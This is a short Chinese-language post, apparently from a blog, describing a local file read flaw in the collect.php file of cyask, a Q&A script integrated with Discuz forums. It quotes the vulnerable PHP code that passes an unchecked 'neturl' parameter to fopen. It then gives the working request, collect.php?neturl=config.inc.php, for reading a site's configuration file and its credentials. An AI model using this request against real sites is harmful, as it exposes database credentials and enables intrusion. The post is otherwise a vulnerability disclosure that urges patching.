cyask的一個本地讀文件的漏洞利用

昨天在晚上看到了一個這樣的文章,卻沒有人說利用的方法,自己研究了一下,原來這麼簡單。
下面是這篇文章的內容。

下午幫同事看一個站,DZ的論壇,該補的都補了,咱也沒圈day
然後逛了下有個仿百度知道的程序在上面,和DZ整合了,原以爲也是Dz開發的,估計也沒啥問題
下來看代碼,看到collect.php
-------------------------------
else
{
    /*
    檢查網址
    */
    $url=get_referer();
    $neturl=empty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);
   
    $collect_url=empty($neturl) ? $url : $neturl;
   
    $contents = '';
    if($fid=@fopen($collect_url,"r"))
    {
        do
        {
            $data = fread($fid, 4096);
            if (strlen($data) == 0)
            {
                break;
            }
            $contents .= $data;
        }
        while(true);
        fclose($fid);
    }
    else
    {
        show_message('collect_url_error', '');
        exit;
    }
----------------------------------
害人啊,本來還挺安全的一個站,整合個毛呃……

找一個cyask的網站,在其上面註冊,然後登錄後,輸入http://www.×××.com/collect.php?neturl=config.inc.php  在內容快照裏面點右鍵,點查看源文件,哇,什麼都看到了,我只是說出來利用方法,希望大家儘早補漏洞。一切損失與本人無關哦!

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章